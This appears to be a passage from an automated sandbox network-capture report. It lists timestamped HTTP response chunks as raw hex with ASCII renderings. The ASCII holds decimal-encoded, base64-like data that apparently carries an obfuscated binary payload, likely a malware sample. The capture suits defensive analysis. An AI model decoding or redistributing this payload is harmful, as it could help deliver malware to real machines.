                                                                                              2021-09-27 18:28:01 UTC4660INData Raw: 20 31 30 31 20 30 20 38 37 20 30 20 35 36 20 30 20 31 30 38 20 30 20 38 32 20 30 20 31 31 39 20 30 20 34 37 20 30 20 35 36 20 30 20 31 30 38 20 30 20 37 31 20 30 20 37 37 20 30 20 37 38 20 30 20 36 35 20 30 20 36 35 20 30 20 38 30 20 30 20 35 36 20 30 20 31 30 38 20 30 20 37 32 20 30 20 37 37 20 30 20 37 38 20 30 20 36 35 20 30 20 36 35 20 30 20 38 30 20 30 20 35 36 20 30 20 31 30 38 20 30 20 38 39 20 30 20 37 37 20 30 20 37 34 20 30 20 36 35 20 30 20 36 35 20 30 20 38 30 20 30 20 35 36 20 30 20 31 30 38 20 30 20 38 38 20 30 20 37 37 20 30 20 37 34 20 30 20 36 35 20 30 20 36 35 20 30 20 38 30 20 30 20 35 36 20 30 20 31 30 38 20 30 20 39 30 20 30 20 37 37 20 30 20 37 34 20 30 20 36 35 20 30 20 36 35 20 30 20 38 30 20 30 20 35 36 20 30 20 31 30 38 20 30 20
                                                                                              Data Ascii: 101 0 87 0 56 0 108 0 82 0 119 0 47 0 56 0 108 0 71 0 77 0 78 0 65 0 65 0 80 0 56 0 108 0 72 0 77 0 78 0 65 0 65 0 80 0 56 0 108 0 89 0 77 0 74 0 65 0 65 0 80 0 56 0 108 0 88 0 77 0 74 0 65 0 65 0 80 0 56 0 108 0 90 0 77 0 74 0 65 0 65 0 80 0 56 0 108 0
                                                                                              2021-09-27 18:28:01 UTC4676INData Raw: 20 31 31 39 20 30 20 36 36 20 30 20 37 39 20 30 20 36 35 20 30 20 37 31 20 30 20 36 39 20 30 20 36 35 20 30 20 39 38 20 30 20 38 31 20 30 20 36 36 20 30 20 31 30 38 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 36 20 30 20 37 30 20 30 20 36 35 20 30 20 37 31 20 30 20 35 32 20 30 20 36 35 20 30 20 31 30 30 20 30 20 31 30 33 20 30 20 36 36 20 30 20 31 31 32 20 30 20 36 35 20 30 20 37 32 20 30 20 37 33 20 30 20 36 35 20 30 20 39 38 20 30 20 31 31 39 20 30 20 36 36 20 30 20 31 31 37 20 30 20 36 35 20 30 20 37 31 20 30 20 34 38 20 30 20 36 35 20 30 20 39 30 20 30 20 38 31 20 30 20 36 36 20 30 20 31 31 37 20 30 20 36 35 20 30 20 37 32 20 30 20 38 31 20 30 20 36 35 20 30 20 38 36 20 30 20 31 30 33 20 30 20
                                                                                              Data Ascii: 119 0 66 0 79 0 65 0 71 0 69 0 65 0 98 0 81 0 66 0 108 0 65 0 65 0 65 0 65 0 65 0 65 0 66 0 70 0 65 0 71 0 52 0 65 0 100 0 103 0 66 0 112 0 65 0 72 0 73 0 65 0 98 0 119 0 66 0 117 0 65 0 71 0 48 0 65 0 90 0 81 0 66 0 117 0 65 0 72 0 81 0 65 0 86 0 103 0
                                                                                              2021-09-27 18:28:01 UTC4692INData Raw: 30 20 31 31 39 20 30 20 36 35 20 30 20 31 30 38 20 30 20 36 35 20 30 20 37 32 20 30 20 37 37 20 30 20 36 35 20 30 20 38 30 20 30 20 31 30 33 20 30 20 36 35 20 30 20 31 30 38 20 30 20 36 35 20 30 20 37 32 20 30 20 37 37 20 30 20 36 35 20 30 20 36 38 20 30 20 38 31 20 30 20 36 35 20 30 20 37 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 33 20 30 20 36 35 20 30 20 37 31 20 30 20 37 33 20 30 20 36 35 20 30 20 39 30 20 30 20 31 31 39 20 30 20 36 36 20 30 20 31 30 36 20 30 20 36 35 20 30 20 37 31 20 30 20 35 36 20 30 20 36 35 20 30 20 39 38 20 30 20 36 35 20 30 20 36 36 20 30 20 31 31 38 20 30 20 36 35 20 30 20 37 32 20 30 20 37 33 20 30 20 36 35 20 30 20 38 30 20 30 20 38 31 20 30 20
                                                                                              Data Ascii: 0 119 0 65 0 108 0 65 0 72 0 77 0 65 0 80 0 103 0 65 0 108 0 65 0 72 0 77 0 65 0 68 0 81 0 65 0 75 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 103 0 65 0 71 0 73 0 65 0 90 0 119 0 66 0 106 0 65 0 71 0 56 0 65 0 98 0 65 0 66 0 118 0 65 0 72 0 73 0 65 0 80 0 81 0
                                                                                              2021-09-27 18:28:01 UTC4708INData Raw: 20 37 37 20 30 20 31 30 37 20 30 20 35 33 20 30 20 31 30 38 20 30 20 31 30 31 20 30 20 37 32 20 30 20 38 31 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 38 35 20 30 20 37 32 20 30 20 37 34 20 30 20 31 31 38 20 30 20 38 39 20 30 20 35 30 20 30 20 38 36 20 30 20 31 32 32 20 30 20 39 39 20 30 20 31 32 32 20 30 20 37 37 20 30 20 31 32 31 20 30 20 38 32 20 30 20 31 30 39 20 30 20 31 30 38 20 30 20 31 32 31 20 30 20 39 39 20 30 20 35 31 20 30 20 38 31 20 30 20 36 35 20 30 20 36 35 20 30 20 37 30 20 30 20 36 36 20 30 20 31 32 31 20 30 20 39 38 20 30 20 35 30 20 30 20 37 38 20 30 20 31 30 38 20 30 20 39 39 20 30 20 35 31 20 30 20 37 37 20 30 20 31 32 32 20 30 20 37 37 20 30 20 31 30 37 20 30 20 35 33 20 30 20 31 30 38 20 30
                                                                                              Data Ascii: 77 0 107 0 53 0 108 0 101 0 72 0 81 0 65 0 65 0 65 0 65 0 65 0 85 0 72 0 74 0 118 0 89 0 50 0 86 0 122 0 99 0 122 0 77 0 121 0 82 0 109 0 108 0 121 0 99 0 51 0 81 0 65 0 65 0 70 0 66 0 121 0 98 0 50 0 78 0 108 0 99 0 51 0 77 0 122 0 77 0 107 0 53 0 108 0
                                                                                              2021-09-27 18:28:01 UTC4724INData Raw: 30 20 31 32 32 20 30 20 31 30 37 20 30 20 36 35 20 30 20 36 35 20 30 20 36 36 20 30 20 37 35 20 30 20 35 33 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 38 38 20 30 20 37 39 20 30 20 38 31 20 30 20 36 35 20 30 20 36 35 20 30 20 37 31 20 30 20 31 31 34 20 30 20 31 30 37 20 30 20 36 35 20 30 20 36 35 20 30 20 36 38 20 30 20 31 31 33 20 30 20 35 32 20 30 20 31 31 39 20 30 20 36 35 20 30 20 36 35 20 30 20 34 37 20 30 20 37 39 20 30 20 37 37 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 36 20 30 20 31 30 37 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 38 20 30 20 31 31 37 20 30 20 35 36 20 30 20 36 35 20 30 20 36 35 20 30 20 37 33 20 30 20 39 38 20
                                                                                              Data Ascii: 0 122 0 107 0 65 0 65 0 66 0 75 0 53 0 65 0 65 0 65 0 88 0 79 0 81 0 65 0 65 0 71 0 114 0 107 0 65 0 65 0 68 0 113 0 52 0 119 0 65 0 65 0 47 0 79 0 77 0 65 0 65 0 65 0 106 0 107 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 108 0 117 0 56 0 65 0 65 0 73 0 98
                                                                                              2021-09-27 18:28:01 UTC4740INData Raw: 36 39 20 30 20 39 39 20 30 20 31 30 39 20 30 20 37 30 20 30 20 35 31 20 30 20 38 32 20 30 20 31 31 30 20 30 20 37 34 20 30 20 31 30 34 20 30 20 39 38 20 30 20 38 37 20 30 20 38 36 20 30 20 36 38 20 30 20 39 38 20 30 20 35 30 20 30 20 35 33 20 30 20 34 38 20 30 20 39 39 20 30 20 31 30 39 20 30 20 35 37 20 30 20 31 31 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 38 20 30 20 31 30 39 20 30 20 36 35 20 30 20 38 35 20 30 20 34 39 20 30 20 31 30 38 20 30 20 39 39 20 30 20 35 31 20 30 20 37 38 20 30 20 31 30 34 20 30 20 39 30 20 30 20 35 30 20 30 20 38 36 20 30 20 36 37 20 30 20 39 38 20 30 20 35 31 20 30 20 31 30 34 20 30 20 38 38 20 30 20 36 35 20 30 20 37 37 20 30 20 36 39 20 30 20 36 36 20 30 20 38 34 20 30 20 37 31 20 30 20 35 37 20 30 20 31 30 34 20 30 20
                                                                                              Data Ascii: 69 0 99 0 109 0 70 0 51 0 82 0 110 0 74 0 104 0 98 0 87 0 86 0 68 0 98 0 50 0 53 0 48 0 99 0 109 0 57 0 115 0 65 0 65 0 68 0 109 0 65 0 85 0 49 0 108 0 99 0 51 0 78 0 104 0 90 0 50 0 86 0 67 0 98 0 51 0 104 0 88 0 65 0 77 0 69 0 66 0 84 0 71 0 57 0 104 0
                                                                                              2021-09-27 18:28:01 UTC4756INData Raw: 20 30 20 36 35 20 30 20 31 30 33 20 30 20 37 33 20 30 20 38 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 36 20 30 20 38 39 20 30 20 36 35 20 30 20 31 30 33 20 30 20 36 37 20 30 20 36 35 20 30 20 31 30 34 20 30 20 31 30 33 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 37 32 20 30 20 36 35 20 30 20 36 37 20 30 20 36 35 20 30 20 37 33 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 38 31 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 37 37 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 33 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35
                                                                                              Data Ascii: 0 65 0 103 0 73 0 85 0 65 0 65 0 65 0 66 0 89 0 65 0 103 0 67 0 65 0 104 0 103 0 65 0 65 0 65 0 72 0 65 0 67 0 65 0 73 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 81 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 77 0 65 0 65 0 103 0 65 0 65 0 65
                                                                                              2021-09-27 18:28:01 UTC4772INData Raw: 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 36 20 30 20 37 30 20 30 20 31 32 30 20 30 20 39 30 20 30 20 31 30 36 20 30 20 37 30 20 30 20 31 32 30 20 30 20 39 30 20 30 20 31 30 36 20 30 20 37 30 20 30 20 31 32 30 20 30 20 39 30 20 30 20 31 30 36 20 30 20 37 30 20 30 20 31 32 30 20 30 20 39 30 20 30 20 31 30 36 20 30 20
                                                                                              Data Ascii: 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 106 0 70 0 120 0 90 0 106 0 70 0 120 0 90 0 106 0 70 0 120 0 90 0 106 0 70 0 120 0 90 0 106 0
                                                                                              2021-09-27 18:28:01 UTC4788INData Raw: 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 31 31 37 20 30 20 31 31 30 20 30 20 35 33 20 30 20 31 30 37 20 30 20 34 37 20 30 20 34 37 20 30 20 31 30 32 20 30 20 31 32 31 20 30 20 31 32 32 20 30 20 31 31 32 20 30 20 31 30 34 20 30 20 35 31 20 30 20 35 35 20 30 20 31 31 35 20 30 20 39 37 20 30 20 38 32 20 30 20 34 37 20 30 20 34 37 20 30 20 31 30 31 20 30 20 35 34 20 30 20 34 37 20 30 20 34 37 20 30 20 34 37 20 30 20 39 39 20
                                                                                              Data Ascii: 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 117 0 110 0 53 0 107 0 47 0 47 0 102 0 121 0 122 0 112 0 104 0 51 0 55 0 115 0 97 0 82 0 47 0 47 0 101 0 54 0 47 0 47 0 47 0 99
                                                                                              2021-09-27 18:28:01 UTC4804INData Raw: 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 35 37 20 30 20 35 36 20 30 20 34 33 20 30 20 31 31 37 20 30 20 35 32 20 30 20 35 35 20 30 20 31 32 31 20 30 20 31 30 38 20 30 20 35 32 20 30 20 35 35 20 30 20 31 32 31 20 30 20 31 30 38 20 30 20 35 32 20 30 20 35 35 20 30 20 31 32 31 20 30 20 31 30 38 20 30 20 35 32 20 30 20 35 35 20 30 20 31 32 31 20 30 20 31 30 38 20 30 20 35 32 20 30 20 35 35 20 30 20 31 32 31 20 30 20 31 30 38 20 30 20 35 32 20 30 20 35 35 20 30 20 31 32 31 20 30 20 31 30 38 20 30 20 35 32 20 30 20 35 35 20 30 20 31 32 31 20 30 20 31 30 38 20 30 20 31 31 39 20 30 20 35 34 20 30 20 36 37 20 30 20 38 39 20 30 20 35 33 20 30 20 35 36 20 30 20 31 30 31 20 30
                                                                                              Data Ascii: 5 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 57 0 56 0 43 0 117 0 52 0 55 0 121 0 108 0 52 0 55 0 121 0 108 0 52 0 55 0 121 0 108 0 52 0 55 0 121 0 108 0 52 0 55 0 121 0 108 0 52 0 55 0 121 0 108 0 52 0 55 0 121 0 108 0 119 0 54 0 67 0 89 0 53 0 56 0 101 0
                                                                                              2021-09-27 18:28:01 UTC4820INData Raw: 20 34 33 20 30 20 31 31 38 20 30 20 34 37 20 30 20 35 34 20 30 20 34 37 20 30 20 34 37 20 30 20 31 31 34 20 30 20 34 37 20 30 20 34 33 20 30 20 31 31 38 20 30 20 34 37 20 30 20 35 34 20 30 20 34 37 20 30 20 35 37 20 30 20 31 32 32 20 30 20 38 36 20 30 20 31 31 33 20 30 20 34 37 20 30 20 34 33 20 30 20 31 31 31 20 30 20 31 30 34 20 30 20 31 31 39 20 30 20 37 36 20 30 20 34 37 20 30 20 34 39 20 30 20 31 30 30 20 30 20 35 35 20 30 20 31 31 39 20 30 20 34 37 20 30 20 35 37 20 30 20 38 38 20 30 20 31 30 31 20 30 20 35 36 20 30 20 38 30 20 30 20 34 33 20 30 20 31 30 31 20 30 20 31 31 32 20 30 20 35 35 20 30 20 36 38 20 30 20 34 37 20 30 20 39 39 20 30 20 38 38 20 30 20 38 32 20 30 20 35 32 20 30 20 34 37 20 30 20 34 37 20 30 20 34 37 20 30 20 34 37 20 30 20 34
                                                                                              Data Ascii: 43 0 118 0 47 0 54 0 47 0 47 0 114 0 47 0 43 0 118 0 47 0 54 0 47 0 57 0 122 0 86 0 113 0 47 0 43 0 111 0 104 0 119 0 76 0 47 0 49 0 100 0 55 0 119 0 47 0 57 0 88 0 101 0 56 0 80 0 43 0 101 0 112 0 55 0 68 0 47 0 99 0 88 0 82 0 52 0 47 0 47 0 47 0 47 0 4
                                                                                              2021-09-27 18:28:01 UTC4836INData Raw: 20 37 34 20 30 20 37 32 20 30 20 34 37 20 30 20 35 36 20 30 20 36 38 20 30 20 31 30 31 20 30 20 38 37 20 30 20 34 37 20 30 20 34 37 20 30 20 36 35 20 30 20 35 31 20 30 20 31 30 38 20 30 20 31 31 38 20 30 20 34 37 20 30 20 31 31 39 20 30 20 37 36 20 30 20 31 31 32 20 30 20 37 36 20 30 20 34 37 20 30 20 35 36 20 30 20 36 37 20 30 20 39 37 20 30 20 37 39 20 30 20 34 37 20 30 20 34 37 20 30 20 36 35 20 30 20 31 31 34 20 30 20 31 30 37 20 30 20 31 30 32 20 30 20 34 37 20 30 20 31 31 36 20 30 20 37 34 20 30 20 31 31 31 20 30 20 35 31 20 30 20 34 37 20 30 20 35 35 20 30 20 38 33 20 30 20 37 31 20 30 20 37 36 20 30 20 34 37 20 30 20 34 37 20 30 20 36 35 20 30 20 31 31 34 20 30 20 31 30 37 20 30 20 31 30 32 20 30 20 34 37 20 30 20 31 31 39 20 30 20 37 37 20 30 20
                                                                                              Data Ascii: 74 0 72 0 47 0 56 0 68 0 101 0 87 0 47 0 47 0 65 0 51 0 108 0 118 0 47 0 119 0 76 0 112 0 76 0 47 0 56 0 67 0 97 0 79 0 47 0 47 0 65 0 114 0 107 0 102 0 47 0 116 0 74 0 111 0 51 0 47 0 55 0 83 0 71 0 76 0 47 0 47 0 65 0 114 0 107 0 102 0 47 0 119 0 77 0
                                                                                              2021-09-27 18:28:01 UTC4852INData Raw: 38 20 30 20 36 35 20 30 20 37 31 20 30 20 31 30 33 20 30 20 36 35 20 30 20 39 38 20 30 20 31 31 39 20 30 20 36 36 20 30 20 31 31 38 20 30 20 36 35 20 30 20 37 32 20 30 20 37 37 20 30 20 36 35 20 30 20 39 30 20 30 20 38 31 20 30 20 36 35 20 30 20 31 30 33 20 30 20 36 35 20 30 20 36 39 20 30 20 37 37 20 30 20 36 35 20 30 20 39 38 20 30 20 31 31 39 20 30 20 36 36 20 30 20 31 31 35 20 30 20 36 35 20 30 20 37 32 20 30 20 38 35 20 30 20 36 35 20 30 20 39 38 20 30 20 38 31 20 30 20 36 35 20 30 20 31 30 39 20 30 20 36 35 20 30 20 37 31 20 30 20 35 32 20 30 20 36 35 20 30 20 39 39 20 30 20 31 31 39 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 38 34 20 30 20 37 34 20 30 20 31 31 39 20 30 20 31 30 39 20 30 20 36
                                                                                              Data Ascii: 8 0 65 0 71 0 103 0 65 0 98 0 119 0 66 0 118 0 65 0 72 0 77 0 65 0 90 0 81 0 65 0 103 0 65 0 69 0 77 0 65 0 98 0 119 0 66 0 115 0 65 0 72 0 85 0 65 0 98 0 81 0 65 0 109 0 65 0 71 0 52 0 65 0 99 0 119 0 65 0 65 0 65 0 65 0 65 0 65 0 84 0 74 0 119 0 109 0 6
                                                                                              2021-09-27 18:28:01 UTC4868INData Raw: 35 20 30 20 36 37 20 30 20 36 36 20 30 20 38 35 20 30 20 37 31 20 30 20 31 30 33 20 30 20 36 36 20 30 20 38 37 20 30 20 36 35 20 30 20 36 36 20 30 20 37 36 20 30 20 36 35 20 30 20 36 35 20 30 20 31 31 39 20 30 20 36 35 20 30 20 34 33 20 30 20 31 30 33 20 30 20 37 37 20 30 20 36 35 20 30 20 36 35 20 30 20 38 30 20 30 20 34 37 20 30 20 34 37 20 30 20 31 30 33 20 30 20 38 31 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 37 34 20 30 20 38 31 20 30 20 36 36 20 30 20 31 31 39 20 30 20 36 36 20 30 20 31
                                                                                              Data Ascii: 5 0 67 0 66 0 85 0 71 0 103 0 66 0 87 0 65 0 66 0 76 0 65 0 65 0 119 0 65 0 43 0 103 0 77 0 65 0 65 0 80 0 47 0 47 0 103 0 81 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 74 0 81 0 66 0 119 0 66 0 1
                                                                                              2021-09-27 18:28:01 UTC4884INData Raw: 20 30 20 36 35 20 30 20 37 39 20 30 20 31 30 33 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 37 34 20 30 20 38 31 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 39 39 20 30 20 36 35 20 30 20 38 30 20 30 20 38 31 20 30 20 36 36 20 30 20 35 32 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 33 20 30 20 36 35 20 30 20 35 35 20 30 20 31 30 33 20 30 20 38 30 20 30 20 34 37 20 30 20 34 37 20 30 20 35 32 20 30 20 37 33 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 37 30 20 30 20 36 36 20 30 20 36 36 20 30 20 36 35 20 30
                                                                                              Data Ascii: 0 65 0 79 0 103 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 65 0 74 0 81 0 65 0 65 0 65 0 65 0 65 0 65 0 99 0 65 0 80 0 81 0 66 0 52 0 65 0 65 0 103 0 65 0 55 0 103 0 80 0 47 0 47 0 52 0 73 0 65 0 65 0 65 0 65 0 65 0 65 0 70 0 66 0 66 0 65 0
                                                                                              2021-09-27 18:28:01 UTC4900INData Raw: 36 36 20 30 20 31 30 38 20 30 20 36 35 20 30 20 37 32 20 30 20 37 33 20 30 20 36 35 20 30 20 37 33 20 30 20 36 35 20 30 20 36 36 20 30 20 31 31 35 20 30 20 36 35 20 30 20 37 31 20 30 20 35 36 20 30 20 36 35 20 30 20 39 30 20 30 20 31 31 39 20 30 20 36 36 20 30 20 31 31 30 20 30 20 36 35 20 30 20 37 31 20 30 20 38 35 20 30 20 36 35 20 30 20 39 30 20 30 20 36 35 20 30 20 36 35 20 30 20 31 31 36 20 30 20 36 35 20 30 20 37 31 20 30 20 31 30 37 20 30 20 36 35 20 30 20 39 38 20 30 20 31 30 33 20 30 20 36 35 20 30 20 31 30 33 20 30 20 36 35 20 30 20 37 32 20 30 20 38 35 20 30 20 36 35 20 30 20 39 39 20 30 20 31 31 39 20 30 20 36 36 20 30 20 31 30 38 20 30 20 36 35 20 30 20 37 32 20 30 20 37 33 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20
                                                                                              Data Ascii: 66 0 108 0 65 0 72 0 73 0 65 0 73 0 65 0 66 0 115 0 65 0 71 0 56 0 65 0 90 0 119 0 66 0 110 0 65 0 71 0 85 0 65 0 90 0 65 0 65 0 116 0 65 0 71 0 107 0 65 0 98 0 103 0 65 0 103 0 65 0 72 0 85 0 65 0 99 0 119 0 66 0 108 0 65 0 72 0 73 0 65 0 65 0 65 0 65 0
                                                                                              2021-09-27 18:28:01 UTC4912INData Raw: 20 36 35 20 30 20 37 37 20 30 20 31 30 33 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 37 39 20 30 20 36 35 20 30 20 36 35 20 30 20 37 37 20 30 20 36 35 20 30 20 36 35 20 30 20 36 39 20 30 20 36 35 20 30 20 38 33 20 30 20 38 31 20 30 20 36 36 20 30 20 31 31 37 20 30 20 36 35 20 30 20 37 32 20 30 20 38 31 20 30 20 36 35 20 30 20 39 30 20 30 20 38 31 20 30 20 36 36 20 30 20 31 32 31 20 30 20 36 35 20 30 20 37 31 20 30 20 35 32 20 30 20 36 35 20 30 20 38 39 20 30 20 38 31 20 30 20 36 36 20 30 20 31 31 35 20 30 20 36 35 20 30 20 36 39 20 30 20 35 32 20 30 20 36 35 20 30 20 38 39 20 30 20 38 31 20 30 20 36 36 20 30 20 31 31 36 20 30 20 36 35 20 30 20 37 31 20 30 20 38 35 20 30 20 36 35 20 30 20 36 35 20 30
                                                                                              Data Ascii: 65 0 77 0 103 0 65 0 65 0 65 0 65 0 65 0 65 0 79 0 65 0 65 0 77 0 65 0 65 0 69 0 65 0 83 0 81 0 66 0 117 0 65 0 72 0 81 0 65 0 90 0 81 0 66 0 121 0 65 0 71 0 52 0 65 0 89 0 81 0 66 0 115 0 65 0 69 0 52 0 65 0 89 0 81 0 66 0 116 0 65 0 71 0 85 0 65 0 65 0
                                                                                              2021-09-27 18:28:01 UTC4928INData Raw: 36 38 20 30 20 31 31 38 20 30 20 31 30 30 20 30 20 31 31 37 20 30 20 35 31 20 30 20 35 33 20 30 20 37 34 20 30 20 31 31 31 20 30 20 35 34 20 30 20 38 33 20 30 20 31 31 32 20 30 20 34 33 20 30 20 38 31 20 30 20 39 30 20 30 20 37 30 20 30 20 39 38 20 30 20 31 31 37 20 30 20 35 35 20 30 20 31 31 33 20 30 20 38 33 20 30 20 38 30 20 30 20 31 30 37 20 30 20 31 30 30 20 30 20 39 38 20 30 20 31 30 37 20 30 20 31 31 38 20 30 20 31 31 38 20 30 20 36 39 20 30 20 31 31 37 20 30 20 39 30 20 30 20 38 36 20 30 20 34 39 20 30 20 31 30 30 20 30 20 37 36 20 30 20 37 38 20 30 20 34 39 20 30 20 36 38 20 30 20 34 33 20 30 20 35 31 20 30 20 31 32 30 20 30 20 39 39 20 30 20 39 39 20 30 20 36 37 20 30 20 31 30 39 20 30 20 34 39 20 30 20 37 37 20 30 20 37 32 20 30 20 31 31 39 20
                                                                                              Data Ascii: 68 0 118 0 100 0 117 0 51 0 53 0 74 0 111 0 54 0 83 0 112 0 43 0 81 0 90 0 70 0 98 0 117 0 55 0 113 0 83 0 80 0 107 0 100 0 98 0 107 0 118 0 118 0 69 0 117 0 90 0 86 0 49 0 100 0 76 0 78 0 49 0 68 0 43 0 51 0 120 0 99 0 99 0 67 0 109 0 49 0 77 0 72 0 119
                                                                                              2021-09-27 18:28:01 UTC4944INData Raw: 36 37 20 30 20 35 35 20 30 20 38 34 20 30 20 31 31 36 20 30 20 37 35 20 30 20 31 31 33 20 30 20 31 31 32 20 30 20 38 31 20 30 20 38 31 20 30 20 31 31 32 20 30 20 37 39 20 30 20 36 39 20 30 20 37 38 20 30 20 34 33 20 30 20 36 36 20 30 20 31 30 32 20 30 20 37 30 20 30 20 31 31 36 20 30 20 31 30 38 20 30 20 31 31 32 20 30 20 35 33 20 30 20 37 37 20 30 20 31 32 30 20 30 20 31 30 35 20 30 20 38 33 20 30 20 35 32 20 30 20 35 35 20 30 20 38 36 20 30 20 34 39 20 30 20 34 33 20 30 20 37 35 20 30 20 37 32 20 30 20 31 31 32 20 30 20 31 30 36 20 30 20 31 30 33 20 30 20 31 31 31 20 30 20 31 30 38 20 30 20 37 32 20 30 20 31 31 37 20 30 20 38 31 20 30 20 31 30 31 20 30 20 35 36 20 30 20 39 30 20 30 20 35 37 20 30 20 39 37 20 30 20 31 30 34 20 30 20 31 32 31 20 30 20 38
                                                                                              Data Ascii: 67 0 55 0 84 0 116 0 75 0 113 0 112 0 81 0 81 0 112 0 79 0 69 0 78 0 43 0 66 0 102 0 70 0 116 0 108 0 112 0 53 0 77 0 120 0 105 0 83 0 52 0 55 0 86 0 49 0 43 0 75 0 72 0 112 0 106 0 103 0 111 0 108 0 72 0 117 0 81 0 101 0 56 0 90 0 57 0 97 0 104 0 121 0 8
                                                                                              2021-09-27 18:28:01 UTC4960INData Raw: 38 33 20 30 20 31 32 32 20 30 20 31 31 38 20 30 20 37 30 20 30 20 31 31 38 20 30 20 31 31 36 20 30 20 38 32 20 30 20 31 31 33 20 30 20 38 33 20 30 20 31 31 39 20 30 20 31 30 32 20 30 20 31 31 36 20 30 20 38 33 20 30 20 38 37 20 30 20 34 39 20 30 20 31 30 35 20 30 20 31 31 32 20 30 20 35 37 20 30 20 31 30 30 20 30 20 36 37 20 30 20 35 36 20 30 20 37 33 20 30 20 39 38 20 30 20 37 33 20 30 20 37 32 20 30 20 38 33 20 30 20 37 38 20 30 20 39 30 20 30 20 31 30 33 20 30 20 35 36 20 30 20 35 30 20 30 20 31 32 31 20 30 20 35 34 20 30 20 31 31 34 20 30 20 35 30 20 30 20 37 38 20 30 20 31 30 33 20 30 20 34 38 20 30 20 38 30 20 30 20 31 30 32 20 30 20 31 31 31 20 30 20 35 37 20 30 20 37 36 20 30 20 38 33 20 30 20 31 31 30 20 30 20 38 32 20 30 20 36 38 20 30 20 39 30
